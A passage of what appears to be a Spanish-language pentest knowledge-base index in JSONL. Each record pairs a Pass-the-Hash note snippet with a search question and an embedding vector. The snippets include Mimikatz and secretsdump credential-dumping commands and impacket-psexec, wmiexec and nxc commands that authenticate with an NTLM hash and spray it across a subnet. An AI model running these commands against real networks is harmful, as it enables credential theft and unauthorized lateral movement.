-0.05956, -0.01688, 0.01172, -0.06595, -0.04284, 0.07912, 0.0139, 0.04022, 0.01792, -0.08389, 0.02934, -0.04489, -0.01403, 0.04351, -0.10712, 0.01576, -0.01817, -0.01971, -0.05497, -0.10993, -0.0258, 0.03104, -0.06928, -0.11104, 0.03774, 0.00098, 0.00864, 0.03525, -0.00967, 0.06008, 0.00368, -0.02869, 0.0189, -0.07436, -0.07884, 0.05236, -0.01655, 0.0193, 0.04434, -0.16594, -0.14556, -0.0184, 0.00252, 0.0893, -0.0288, -0.06903, 0.00166, 0.0096, 0.05297, -0.08226, -0.08967, 0.02826, -0.01594, -0.02115, 0.00443, 0.09838, -0.025, 0.00851, -0.01517, -0.09299, -0.00493, 0.11479, -0.03706, -0.02038, -0.0609, 0.02209, -0.12405, -0.02135, -0.00817, -0.02711, 0.05452, 0.05297, 0.04527, 0.06101, 0.02034, -0.02395, -0.00115, 0.02036, -0.01405, -0.05691, -0.02007, -0.07833, -0.02696, -0.10024, 0.02651, -0.01648, 0.00637, -0.03927, 0.01689, -0.05553, -0.02427, 0.01672, 0.00599, -0.03805, -0.0449, 0.08404, -0.0533, -0.01056, -0.03383, -0.05098, 0.03971, -0.02487, 0.01493, -0.02418, -0.00417, -0.02178, 0.0787, 0.02693, -0.07192, -0.06508, -0.06101, -0.01836, 0.04001, -0.02272, 0.01637, -0.04945, -0.04027, -0.06266, 0.00855, 0.029, -0.0474, 0.03159, 0.05546, 0.0204, 0.03893, 0.07433, 0.03382, -0.0266, 0.01136, -0.00046, 0.01395, -0.02517, -0.03139, 0.05643, -0.0283, 0.04833, 0.11697, 0.00513, -0.03166, -0.05466, -0.0421, -0.04576, -0.02586, 0.01619, -0.01601, -0.0984, -0.03749, -0.00299, -0.07163, 0.01078, 0.01139, -0.01387, -0.05775, -0.0303, 0.05083, 0.01871, 0.03082, -0.02386]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pass-the-Hash\n\n> Te autenticas con el **hash NTLM** sin conocer la contraseΓ±a en claro. La base del Movimiento lateral en AD.", "indexar": "con que puedo realizar un movimiento lateral usando el hash NTLM?", "v": [-0.06794, 0.03652, -0.17323, -0.10835, -0.1512, 0.02312, -0.21451, 0.19701, -0.07713, 0.08623, -0.0796, -0.00896, 0.10224, 0.09566, 0.00122, 0.09637, 0.00843, -0.09463, -0.08649, -0.01316, -0.13281, -0.05863, -0.09215, -0.08692, 0.10709, -0.01412, 0.00287, -0.00324, -0.1297, -0.01904, -0.12177, -0.00447, 0.00147, 0.02525, 0.07344, -0.03956, 0.03932, 0.06259, 0.03585, 0.08942, -0.02046, 0.12996, -0.15287, 0.04831, 0.03265, -0.00849, -0.10201, -0.09118, -0.01948, -0.15052, 0.06914, 0.12907, -0.16073, -0.11675, -0.02978, -0.07647, 0.16126, -0.02588, -0.03244, -0.1059, 0.05395, 0.02959, 0.02702, -0.04998, -0.03498, -0.12405, 0.04324, -0.028, -0.0524, -0.03076, -0.07686, 0.09421, -0.00268, -0.00478, -0.03493, 0.15014, 0.02934, -0.03158, 0.02613, 0.0813, 0.00073, 0.01038, -0.05133, -0.00569, -0.08852, -0.09672, 0.00092, -0.08167, 0.05253, 0.05753, 0.06764, 0.02934, -0.07354, -0.01562, 0.00116, 0.04131, -0.10186, -0.0074, -0.01314, -0.03454, 0.1237, -0.00674, -0.07547, 0.03305, 0.01033, -0.07561, 0.10673, -0.00636, 0.00036, 0.07397, 0.09731, -0.02938, -0.08602, -0.04401, -0.01813, 0.04047, -0.12484, -0.02773, -0.07203, 0.02905, 0.04614, -0.03348, -0.01657, -0.0195, 0.01395, -0.07105, -0.02456, 0.10994, -0.1162, -0.00084, 0.10217, -0.00233, -0.0433, -0.05011, -0.01498, -0.00484, 0.04199, 0.05498, 0.09042, -0.03965, 0.10148, 0.01719, -0.02756, -0.01041, 0.06145, 0.04952, 0.03185, -0.02134, -0.0214, -0.01863, 0.03261, -0.02161, 0.02554, 0.00169, -0.02829, 0.03097, -0.02647, -0.04819, -0.14534, 0.02791, -0.01419, 0.10989, -0.06465, -0.00835, -0.01673, -0.0443, -0.0056, -0.00074, 0.02622, -0.00942, -0.01166, -0.00073, 0.00631, -0.02817, 0.06437, -0.00092, -0.02554, 0.01081, 0.02652, -0.04748, 0.01131, 0.04091, 0.00105, -0.04757, 0.04881, -0.02473, 0.03814, 0.01863, 0.02628, 0.04902, -0.00356, 0.07764, -0.03023, -0.02257, -0.00413, -0.03835, -0.02308, -0.03354, 0.07289, 0.00529, -0.06482, 0.01651, 0.02757, -0.02139, 0.05278, 0.03539, -0.07149, 0.08084, 0.0234, -0.01413, 0.02315, -0.04121, 0.10735, 0.02698, -0.05868, 0.02354, -0.00193, -0.00199, -0.04537, 0.00473, -0.00909, 0.03386, 0.05851, 0.01558, 0.01265, -0.02574, 0.03958, 0.03441, -0.0161, 0.0375, 0.02741, 0.06551, -0.02095, -0.02839, 0.0395, 0.03229, 0.04616, 0.01574, -0.0621, -0.03762, 0.01619, 0.01336, -0.05629, -0.00109, 0.00315, -0.0449, -0.07931, 0.05185, 0.02205, -0.0178, 0.0392, 0.00747, 0.03941, -0.03053, 0.0098, 0.0091]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pass-the-Hash\n\n> Te autenticas con el **hash NTLM** sin conocer la contraseΓ±a en claro. La base del Movimiento lateral en AD.", "indexar": "cual es una herramienta para autentica con el hash NTLM?", "v": [-0.03938, -0.042, -0.01842, -0.02735, 0.09021, -0.07803, -0.19799, 0.08631, -0.07104, 0.19287, -0.09599, -0.00327, 0.04783, 0.05873, -0.00796, 0.11457, -0.00417, -0.19408, -0.00061, 0.09809, -0.08058, -0.00944, -0.19049, -0.07527, -0.0697, -0.11531, 0.02818, 0.09966, -0.20075, 0.08778, -0.03012, -0.03706, -0.06508, 0.02469, 0.0149, -0.00383, 0.04893, 0.0736, 0.01983, 0.15316, 0.0674, 0.13965, -0.01889, 0.12202, 0.08878, -0.02261, -0.05329, -0.01782, 0.08545, -0.07153, -0.04431, -0.01631, -0.20271, -0.05123, -0.05047, -0.145, 0.19456, -0.02195, 0.01285, -0.07738, -0.1112, -0.01754, -0.04919, -0.13834, -0.08369, -0.06772, 0.05102, -0.07829, -0.04464, 0.03492, -0.05987, 0.05564, 0.06197, -0.05864, -0.04057, 0.01861, -0.00326, 0.00073, 0.06852, 0.05623, 0.10371, -0.08636, -0.00239, -0.01126, -0.09327, -0.07187, 0.06868, -0.04836, 0.04126, -0.00028, -0.05105, 0.04699, -0.00393, -0.01109, 0.06299, -0.07143, 0.07163, -0.09086, 0.00458, -0.03423, 0.12203, -0.09586, -0.07315, 0.10591, -0.0561, -0.02778, -0.02733, 0.01934, -0.06964, 0.09427, 0.08167, -0.02282, -0.04907, 0.06615, 0.03039, 0.04819, -0.02457, -0.03963, -0.03089, -0.09153, -0.00012, 0.0367, -0.03488, 0.00986, 0.04311, 0.01829, -0.06028, 0.10356, -0.03919, -0.08249, 0.04084, -0.05964, -0.06978, 0.0449, 0.01454, -0.05699, 0.03012, -0.13018, 0.01484, -0.04674, 0.06713, 0.02752, 0.00302, -0.07095, 0.0548, 0.01678, -0.05996, -0.0436, -0.03564, -0.01204, 0.06952, -0.01688, 0.02873, 0.03218, -0.0602, 0.01602, -0.0438, 0.03389, -0.14325, 0.04529, -0.02097, -0.03381, 0.04736, 0.00903, -0.01292, -0.02697, 0.04259, 0.02234, 0.03705, 0.00262, 0.04582, -4e-05, 0.07042, -0.00538, 0.02586, -0.06551, -0.03326, -0.02443, -0.02054, -0.12632, 0.01989, -0.00172, 0.01903, -0.03077, 0.04417, -0.01974, 0.0175, 0.0196, -0.03317, 0.02947, -0.01285, 0.03877, -0.05092, -0.04236, 0.04769, 0.03408, 0.01418, -0.08186, 0.07703, 0.01233, -0.04313, -0.01109, -0.00634, -0.0552, 0.03795, 0.06501, -0.04449, -0.04395, -0.0279, 0.01221, 0.02942, 0.01635, 0.026, -0.01867, -0.04141, -0.00117, -0.02303, 0.00411, -0.01214, 0.00522, -0.00143, 0.00045, 0.05122, 0.00919, -0.02428, -0.01941, 0.01761, 0.03066, -0.00737, -0.03281, 0.02195, -0.03369, -0.01691, 0.01197, 0.0281, -0.00884, 0.03803, -0.00099, -0.03555, -0.056, 0.01147, 0.03127, -0.00331, -0.02044, -0.017, 0.00973, -0.02075, -0.01179, -0.03904, -0.04641, -0.01654, -0.01005, 0.065, -0.00552, 0.01057, -0.04383]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## De dΓ³nde sale el hash\n- Mimikatz `sekurlsa::logonpasswords`\n- secretsdump (SAM/NTDS)\n- `lsadump::sam`", "indexar": "ΒΏQuΓ© herramienta puedo usar para extraer contraseΓ±as de autenticaciΓ³n?", "v": [0.06583, 0.09517, -0.11692, -0.11262, 0.09973, -0.07002, -0.05652, -0.12961, -0.10055, -0.03807, -0.15796, -0.00961, -0.0731, -0.02615, -0.01535, -0.00464, 0.13768, -0.05116, 0.04631, 0.06187, 0.02144, -0.06318, -0.13602, -0.05491, -0.08178, -0.02571, 0.04397, 0.03187, -0.14665, 0.02458, -0.02802, 0.07024, 0.08844, 0.01349, -0.05883, 0.06675, 0.02398, 0.10091, 0.04965, 0.06237, 0.12426, 0.04611, -0.07855, 0.06404, 0.01364, 0.066, 0.01449, 0.03436, 0.01921, 0.07383, -0.07209, -0.13589, -0.12831, -0.03364, -0.062, -0.14461, 0.22544, -0.04241, 0.03885, -0.05296, -0.099, 0.03676, -0.02757, 0.04364, -0.10456, -0.1166, 0.05174, -0.05213, -0.12303, 0.11993, -0.04056, 0.01576, 0.04887, 0.08515, 0.00298, 0.00253, 0.02978, -0.06634, 0.06297, 0.07748, -0.0454, 0.0013, 0.06079, -0.06841, -0.10053, -0.02288, 0.10771, -0.06865, 0.06542, -0.09914, 0.00269, 0.022, 0.01835, -0.01879, 0.01628, -0.07212, -0.01557, 0.00475, -0.07021, -0.04282, 0.08416, -0.06949, -0.0084, 0.16532, -0.02483, -0.03632, -0.02306, -0.01485, -0.05152, -0.05775, 0.00616, -0.02543, -0.1021, -0.00439, -0.0348, 0.06789, -0.05378, -0.07169, -0.02067, -0.0563, 0.00403, -0.03299, 0.00895, -0.03806, 0.06831, 0.03755, -0.00338, 0.09708, -0.07983, -0.13504, -0.00168, -0.04456, -0.07688, 0.01283, -0.01766, 0.01466, 0.07561, -0.18193, -0.06772, -0.00853, -0.0174, -0.04948, -0.04388, -0.05319, 0.0398, 0.05179, -0.01931, -0.011, -0.07378, -0.02746, 0.0574, -0.0543, 0.02769, 0.06147, -0.04068, 0.01662, -0.00805, -0.05079, -0.14149, 0.08927, -0.07169, -0.10047, 0.01697, -0.00978, -0.05093, -0.04382, 0.0342, 0.03175, 0.01864, 0.06702, 0.08724, 0.07373, 0.07618, -0.04076, 0.02718, -0.02174, -0.03021, -0.06283, 0.00128, -0.10858, -0.00908, -0.03514, -0.04033, -0.03445, 0.07177, -0.02035, 0.10254, -0.01978, -0.05897, 0.05283, -0.00346, 0.01804, 0.02573, -0.01237, 0.00553, 0.01891, 0.02741, -0.07031, 0.01949, -0.04683, -0.00909, 0.00029, -0.03131, -0.06967, 0.07449, 0.06538, -0.08553, -0.05734, -0.04299, 0.01683, 0.02695, 0.02034, 0.03441, -0.05435, -0.08498, -0.02445, -0.03956, 0.04298, -0.05058, -0.05244, 0.01507, 0.03543, 0.07721, 0.05873, 0.04235, 0.01365, 0.00645, 0.00282, -0.01013, -0.00183, 0.04989, 0.02719, -0.03963, -0.00562, 0.03949, -0.03292, -0.0065, -0.02936, -0.02722, -0.01933, -0.03066, 0.03473, 0.02801, -0.02193, -0.08046, 0.0154, -0.02476, 0.01805, -0.02819, -0.06778, -0.03306, -0.01444, 0.05883, -0.00552, 0.02452, 0.0032]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## De dΓ³nde sale el hash\n- Mimikatz `sekurlsa::logonpasswords`\n- secretsdump (SAM/NTDS)\n- `lsadump::sam`", "indexar": "Con quΓ© programa obtengo las contraseΓ±as guardadas en el registro?", "v": [0.07082, 0.02374, -0.06672, -0.20248, 0.11646, -0.06331, 0.07914, -0.12619, -0.17282, -0.07703, -0.08144, 0.04015, -0.09072, -0.09327, 0.0348, 0.10244, 0.15649, 0.01837, 0.05891, 0.08045, -0.06447, 0.00902, 0.0505, -0.01339, -0.01689, -0.08871, 5e-05, 0.01268, -0.00476, 0.08553, 0.00547, 0.00852, 0.0299, 0.00396, -0.03794, 0.19263, 0.06486, 0.13305, 0.01748, 0.04736, 0.08767, -0.00834, -0.08908, 0.02716, 0.03415, -0.1184, 0.10976, 0.09221, 0.02358, 0.00675, -0.02428, -0.05703, -0.05072, -0.13111, -0.01124, -0.12188, 0.03777, 0.0138, 0.01404, 0.02985, -0.06125, 0.0434, 0.06683, 0.09095, -0.10133, -0.08985, 0.12605, 0.03289, -0.06183, 0.04676, 0.04777, 0.03347, -0.01121, -0.04723, 0.07385, 0.03877, 0.03542, -0.07076, -0.00104, 0.02253, -0.17108, -0.08012, 0.07472, 0.01913, -0.11366, -0.03587, -0.01805, -0.03497, 0.02535, -0.06561, 0.10236, 0.01299, -0.02055, 0.05391, 0.10953, -0.05905, 0.05412, 0.01276, -0.02071, 0.04304, -0.0588, 0.08751, -0.03333, 0.14069, -0.06039, 0.09598, -0.00687, -0.03264, 0.01376, -0.0011, 0.06513, 0.05087, -0.10433, -0.03589, -0.04837, 0.06309, 0.01391, -0.03453, 0.10323, -0.00805, -0.08858, -0.00064, 0.00681, 0.01134, 0.09901, 0.07623, -0.05438, 0.08138, -0.08278, -0.01744, 0.01302, -0.02804, -0.10381, -0.03181, -0.03981, -0.02301, -0.03897, -0.02788, -0.03892, -0.03945, -0.00773, 0.00514, 0.04572, -0.01002, 0.05914, 0.02584, 0.02094, -0.04322, -0.05449, -0.00241, 0.01842, -0.0514, 0.02298, 0.05379, -0.10475, 0.06033, -0.02702, -0.08099, -0.07156, 0.08754, -0.01931, -0.0976, -0.07459, -0.05144, 0.01247, -0.08273, 0.01222, 0.04574, 0.08432, 0.0418, -0.02262, 0.0652, 0.02821, -0.07347, -0.02179, -0.01218, 0.03125, -0.09181, 0.01772, -0.03465, -0.11701, 0.04209, 0.08138, 0.03121, 0.01035, -0.07132, 0.0105, 0.04195, -0.00012, 0.00864, 0.04332, -0.00167, -0.01491, 0.0141, -0.02149, -0.02689, -0.01785, -0.0117, 0.04342, -0.09104, -0.04753, -0.05538, -0.00669, -0.02341, 0.07613, 0.07056, -0.11069, -0.05892, 0.03497, 0.0774, -0.00726, -0.0505, 0.01231, -0.01171, -0.04522, -0.02867, -0.06527, 0.08914, -0.01249, 0.01156, 0.01136, 0.01153, 0.02061, 0.04663, -0.00327, -0.07127, 0.01513, 0.09443, 0.0667, 0.06454, -0.03073, -0.04281, -0.02175, 0.01506, 0.09295, 0.03199, -0.07328, -0.03473, -0.03997, -0.05845, -0.03343, 0.09869, 0.005, -0.08588, -0.03916, 0.02616, -0.03771, 0.04951, 0.0548, -0.01251, -0.06093, 0.00897, 0.0352, -0.04054, 0.03485, -0.03087]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## De dΓ³nde sale el hash\n- Mimikatz `sekurlsa::logonpasswords`\n- secretsdump (SAM/NTDS)\n- `lsadump::sam`", "indexar": "Existe una alternativa libre a Mimikatz para descargar hashes?", "v": [-0.1297, 0.08858, -0.12793, 0.02289, -0.02811, 0.01643, -0.26211, 0.02642, -0.21494, 0.01411, 0.03402, -0.09591, -0.01612, 0.08997, 0.23865, -0.06527, 0.07134, 0.00501, 0.06311, -0.04456, 0.03878, 0.0032, -0.15511, -0.05732, -0.00725, -0.0839, -0.01937, 0.06598, -0.1732, -0.05325, 0.05138, -0.05705, -0.08414, 0.08575, -0.06365, 0.05474, 0.09169, -0.02265, 0.13414, -0.11498, 0.09851, 0.03798, -0.04047, 0.17013, -0.05687, -0.12753, -0.02565, -0.01768, 0.10079, 0.02025, 0.0264, -0.02872, -0.08087, 0.0357, 0.01388, -0.10426, 0.03958, -0.06297, -0.19817, -0.02144, -0.04704, -0.00127, 0.07601, -0.03371, 0.04994, 0.00431, -0.05627, 0.08549, -0.12116, 0.09881, 0.04387, 0.06443, 0.01885, -0.0846, -0.11047, 0.10041, -0.08493, -0.06591, 0.0118, 0.07428, 0.0667, -0.06615, 0.08194, 0.07179, -0.03165, -0.08288, 0.01136, -0.10347, 0.02859, 0.05929, 0.02224, 0.0583, 0.0308, 0.07617, -0.09649, -0.04953, -0.02776, 0.06243, -0.01246, 0.09559, -0.07121, 0.04226, -0.05693, -0.00061, -0.00479, -0.03064, 0.022, -0.01873, -0.00239, 0.03969, 0.01392, -0.02385, 0.02259, -0.00667, -0.05043, -0.03083, 6e-05, 0.05312, -0.04744, -0.00426, -0.01072, 0.01747, 0.00581, -0.0492, 0.03295, -0.06565, -0.03206, 0.04151, -0.08602, -0.00049, 0.08876, -0.04437, -0.06685, -0.0598, -0.01259, -0.08308, 0.13868, -0.03185, -0.03087, -0.05908, -0.01823, -0.04509, -0.03284, -0.01849, 0.0541, -0.01279, -0.04865, -0.00841, 0.06372, -0.072, -0.04618, 0.0209, 0.04191, 0.03121, -0.01477, 0.03913, 0.0454, 0.01956, -0.07071, 0.05063, 0.05258, -0.0837, -0.01032, -0.02024, -0.05113, 0.01864, 0.04896, -0.00423, -0.05416, 0.04875, 0.01934, 0.05777, 0.0658, -0.1019, 0.03877, -0.08079, 0.00785, -0.02103, 0.00733, -0.03447, 0.02385, 0.02032, -0.00516, 0.00157, -0.04918, -0.03101, 0.04309, 0.10633, 0.00165, -0.00206, -0.03237, 0.04299, -0.06825, -0.03897, -0.01464, 0.0305, 0.03355, -0.05738, -0.02308, -0.04152, -0.07134, -0.04838, -0.01106, -0.03024, 0.05469, -0.02952, -0.01034, 0.00417, 0.037, -0.02132, 0.03265, 0.05158, 0.08022, 0.02633, 0.0046, 0.00208, 0.03393, -0.01838, 0.05087, -0.04819, -0.05358, 0.0538, 0.0673, 0.04934, 0.00358, 0.0519, 0.00141, 0.06966, 0.00461, 0.0457, 0.03997, 0.02951, 0.04771, 0.02047, 0.02691, -0.031, -0.05106, 0.05698, -0.02165, 0.01127, 0.02597, 0.03137, 0.00338, -0.02777, -0.00693, -0.0169, -0.04118, -0.00357, -0.00177, -0.04463, -0.04546, 0.0463, 0.01664, 0.04733, 0.01436, 0.00534]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Uso\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' # β†’ SYSTEM\nimpacket-wmiexec -hashes :NTLMHASH 'admin@10.10.10.20'\nnxc smb 10.10.10.0/24 -u admin -H NTLMHASH # spray del hash por la red\n```", "indexar": "que herramienta sirve para ejecutar comandos a travΓ©s de SMB usando un hash?", "v": [0.11968, 0.00351, -0.19155, -0.1403, 0.04636, -0.18187, -0.1311, -0.10099, 0.00193, -0.01159, -0.17217, 0.07663, 0.06699, -0.09805, -0.01772, 0.12753, 0.11523, -0.09483, -0.12622, 0.01172, 0.10292, 0.00885, -0.06865, -0.02678, -0.0819, -0.00078, 0.03481, 0.03981, -0.2415, -0.03134, -0.04208, 0.01863, 0.04176, -0.05986, -0.08725, -0.01127, -0.13847, 0.0236, -0.0279, 0.17374, -0.03504, 0.08529, -0.1546, 0.0196, -0.01499, -0.03397, 0.02221, 0.00778, 0.00945, 0.02127, 0.02054, -0.10166, -0.22923, 0.01707, -0.06745, -0.11783, 0.16846, -0.11595, -0.08704, -0.07508, -0.09048, -0.08424, 0.04112, 0.04191, 0.03146, -0.09494, -0.03232, -0.08804, -0.06637, 0.08111, -0.10106, 0.12441, 0.00033, 0.04815, 0.02237, -0.01802, 0.00439, 0.0185, 0.10806, -0.01516, 0.00978, -0.07843, -0.07372, 0.04691, -0.0796, -0.08104, 0.00796, -0.04856, 0.03897, -0.0482, -0.02393, 0.08003, 0.02338, 0.03645, 0.05297, 0.03525, 0.03282, -0.05209, 0.08125, -0.00045, 0.14503, -0.0764, -0.11596, 0.11543, 0.01591, 0.03158, 0.02846, -0.04373, 0.01607, 0.02696, 0.07446, -0.0416, 0.01845, -0.03641, -0.03861, -0.01056, -0.00938, -0.09482, -0.0167, -0.0467, -0.06229, 0.06495, -0.02585, 0.01792, -0.01085, -0.03823, -0.04818, 0.03497, 0.00258, -0.0444, -0.00231, -0.01777, 0.01915, -0.01029, -0.02163, 0.06022, 0.05496, -0.08698, -0.06641, -0.12511, 0.04749, 0.05458, -0.03531, -0.03059, 0.04581, 0.00089, 0.01683, -0.04364, -0.04121, -0.00911, 0.11381, -0.02875, -0.05762, 0.02393, -0.05349, -0.03835, -0.05757, -0.00911, -0.10407, 0.07161, -0.06877, -0.04416, -0.00451, 0.04569, 0.01544, -0.04776, 0.01932, 0.01263, 0.02231, 0.06051, 0.03949, 0.01468, 0.05801, -0.03086, 0.03026, -0.08169, -0.04708, 0.03069, 0.00905, -0.02474, -0.01001, -0.00948, -0.04885, -0.01851, -0.01459, -0.06225, 0.00493, 0.00455, -0.00967, 0.00587, -0.02706, 0.07505, 0.00021, -0.03075, 0.02489, 0.02636, 0.01876, -0.02492, -0.01025, -0.04592, -0.04531, 0.03961, -0.02587, -0.05321, 0.04503, 0.05926, -0.028, 0.02259, 0.00162, 0.02478, 0.02908, 0.01944, 0.02928, 0.02516, -0.009, -0.0409, 0.00798, 0.03672, 0.00079, -0.01109, 0.00237, 0.0071, 0.0584, -0.02081, -0.00654, 0.015, -0.02533, -0.01685, 0.01116, -0.02037, 0.03495, 0.00404, -0.01002, 0.00056, 0.0266, -0.05072, -0.00547, 0.019, -0.02678, -0.05426, -0.03985, 0.0221, -0.02463, -0.04696, -0.00644, -0.03786, -0.0517, -0.03686, -0.034, -0.03644, -0.00783, 0.01936, 0.05045, -0.0341, -0.01873, -0.03002]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Uso\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' # β†’ SYSTEM\nimpacket-wmiexec -hashes :NTLMHASH 'admin@10.10.10.20'\nnxc smb 10.10.10.0/24 -u admin -H NTLMHASH # spray del hash por la red\n```", "indexar": "con que puedo hacer un spray de hashes por la red?", "v": [0.05181, 0.0566, -0.13271, -0.05695, -0.01709, -0.01261, -0.06737, -0.01505, 0.0479, 0.06154, -0.08953, 0.00869, -0.02729, -0.11503, 0.07667, 0.05497, -0.03214, 0.23381, -0.03691, 0.03122, 0.01894, -0.08099, -0.23949, 0.03915, 0.03198, 0.07562, 0.01903, 0.08487, -0.27841, -0.00301, -0.07102, 0.00464, -0.06042, 0.09218, -0.1572, 0.14169, 0.01933, 0.11646, 0.07448, 0.09536, -0.1338, 0.01794, -0.08837, 0.04756, 0.05818, -0.06214, -0.01677, -0.06248, -0.04433, 0.02112, 0.05306, -0.01786, -0.24317, -0.10595, -0.07904, -0.09175, -0.02911, 0.00982, -0.17677, -0.04466, 0.03746, -0.02835, 0.02038, 0.10512, -0.05535, 0.00526, 0.00539, -0.00258, 0.02426, 0.11636, 0.06428, 0.00523, -0.0584, -0.02162, -0.00316, 0.08993, -0.08568, -0.09524, -0.02991, 0.01349, -0.02176, -0.00819, 0.06141, -0.01747, 0.04996, -0.07093, -0.09132, -0.08166, 0.04239, -0.03667, 0.04688, -0.02194, 0.03783, 0.00715, -0.02685, -0.01614, 0.05795, -0.01213, -0.05388, 0.0088, -0.04145, -0.07997, -0.0601, 0.06358, 0.04381, -0.04885, 0.07249, 0.05135, 0.12935, 0.00016, 0.02096, -0.06355, -0.01747, -0.0664, 0.09595, -0.04765, -0.02487, 0.06999, -0.02625, 0.00791, -0.07635, -0.07638, -0.02697, 0.0628, 0.10772, -0.067, -0.08563, -0.09713, -0.12812, 0.02252, 0.04613, 0.05463, -0.04805, -0.07061, 0.07777, 0.09214, 0.0281, -0.0156, 0.00727, -0.01188, 0.05835, 0.06212, -0.03291, -0.05583, 0.00263, 0.00417, -0.0293, -0.08476, -0.03543, -0.05262, 0.04317, -0.03802, 0.01515, 0.02613, 0.01816, 0.01845, 0.07456, 0.00358, -0.02364, 0.03825, -0.08279, 0.01336, 0.00284, 0.07015, -0.03027, 0.02442, -0.00628, -0.06117, -0.00022, 0.0443, -0.01181, -0.04257, 0.00132, 0.00362, 0.00566, -0.01843, 0.01955, -0.05918, 0.02046, -0.08584, 0.08314, -0.05528, -0.03899, -0.02142, 0.06305, -0.02859, 0.05389, 0.03301, 0.03949, 0.0085, -0.04307, -0.04157, 0.03677, 0.00966, 0.06556, 0.05527, 0.08434, 0.00104, -0.03143, -0.02145, -0.01636, 0.02765, 0.02127, -0.03431, 0.02348, -0.02521, -0.01862, 0.07377, 0.00736, 0.08347, 0.00655, 0.05069, 0.01326, -0.00509, -0.08191, 0.04954, 0.01933, -0.00801, 0.00966, -0.04083, 0.1101, 0.00937, -0.00713, 0.01932, -0.02996, 0.02948, 0.00651, -0.02216, 0.00937, 0.06816, -0.00562, -0.02178, 0.00562, 0.00468, -0.01122, 0.00214, 0.00716, 0.05189, -0.07197, 0.00331, -0.02885, 0.01476, -0.00496, 0.02596, 0.01378, -0.03709, -0.06944, 0.00335, -0.0142, -0.05555, -0.00114, 0.00349, 0.06673, -0.00536, -0.00174, 0.01518]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Uso\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' # β†’ SYSTEM\nimpacket-wmiexec -hashes :NTLMHASH 'admin@10.10.10.20'\nnxc smb 10.10.10.0/24 -u admin -H NTLMHASH # spray del hash por la red\n```", "indexar": "cual es una alternativa libre a psexec o wmiexec?", "v": [-0.15809, -0.01832, -0.0899, 0.09861, -0.04598, -0.07245, -0.01116, -0.13867, -0.10049, -0.04945, -0.05361, -0.10322, -0.14033, 0.01966, 0.1389, -0.06164, 0.06211, 0.0317, 0.11592, -0.02845, -0.01218, -0.08331, -0.16321, -0.03556, 0.01741, -0.0129, -0.04875, -0.00016, -0.10405, -0.05859, 0.00177, -0.00645, 0.02071, -0.0643, 0.07367, 0.04117, 0.10008, -0.01484, 0.09947, 0.03686, 0.05523, -0.11196, -0.18637, 0.10233, -0.06844, -0.10595, -0.02584, 0.07923, 0.1856, -0.02698, -0.06933, -0.03056, -0.13609, 0.07299, 0.1141, 0.07258, 0.09941, -0.09117, -0.0505, -0.01726, -0.02488, 0.08353, 0.08317, -0.08618, 0.02875, 0.05605, 0.02323, -0.05318, -0.02869, 0.04963, 0.06086, 0.0069, -0.03152, -0.06986, -0.07804, -0.03999, -0.07195, -0.06157, -0.00525, 0.02471, 0.01902, -0.04135, -0.07126, 0.01469, 0.02714, 0.0087, 0.10381, -0.12369, -0.00017, 0.04083, 0.12236, 0.00477, -0.00226, 0.12322, -0.04283, -0.10638, 0.01362, 0.06993, 0.0086, 0.08363, 0.06762, 0.06378, -0.13575, 0.02405, -0.00693, -0.04629, -0.06428, 0.0225, -0.09051, 0.03855, -0.00245, 0.04127, -0.0615, 0.02414, -0.01016, -0.13935, -0.08578, -0.00917, -0.0944, -0.01355, -0.02536, 0.00632, 0.00669, -0.07694, -0.01194, -0.01691, 0.06857, 0.10028, -0.03613, 0.01417, 0.04593, -0.05764, -0.0315, -0.12217, -0.11615, -0.01842, 0.10164, 0.05267, -0.04196, -0.02902, 0.0183, 0.00358, 0.03157, -0.01644, 0.03864, 0.03052, -0.00694, -0.00365, -0.00109, -0.0141, -0.05183, -0.07416, 0.0447, 0.16438, -0.08224, 0.05024, -0.03061, -0.04233, -0.00205, 0.03679, 0.00418, -0.02386, 0.01906, -0.02511, -0.0401, 0.01826, 0.02066, -0.03211, -0.0869, 0.02725, 0.00435, 0.06303, 0.09648, -0.05081, 0.04768, -0.10835, -0.04713, -0.14057, 0.06605, -0.00754, 0.03463, -0.00134, -0.0246, -0.00104, 0.00893, -0.04312, -0.01231, 0.01653, -0.01145, 0.00894, -0.03135, -0.00949, -0.07287, -0.11448, -0.01449, -0.04423, 0.00447, -0.08578, 0.02463, -0.03903, -0.0519, -0.03411, -0.00311, -0.04533, 0.01811, -0.03584, -0.0594, 0.04177, -0.00903, 0.05832, 0.05977, 0.02653, 0.0589, -0.0157, -0.05464, 0.00294, 0.0587, -0.02414, -0.04705, 0.00737, 0.02347, 0.01731, 0.0329, -0.02271, 0.02957, 0.03784, 0.02475, 0.02842, 0.0127, 0.01497, -0.02866, 0.00548, -0.00997, 0.00991, 0.04117, 0.04391, 0.01011, 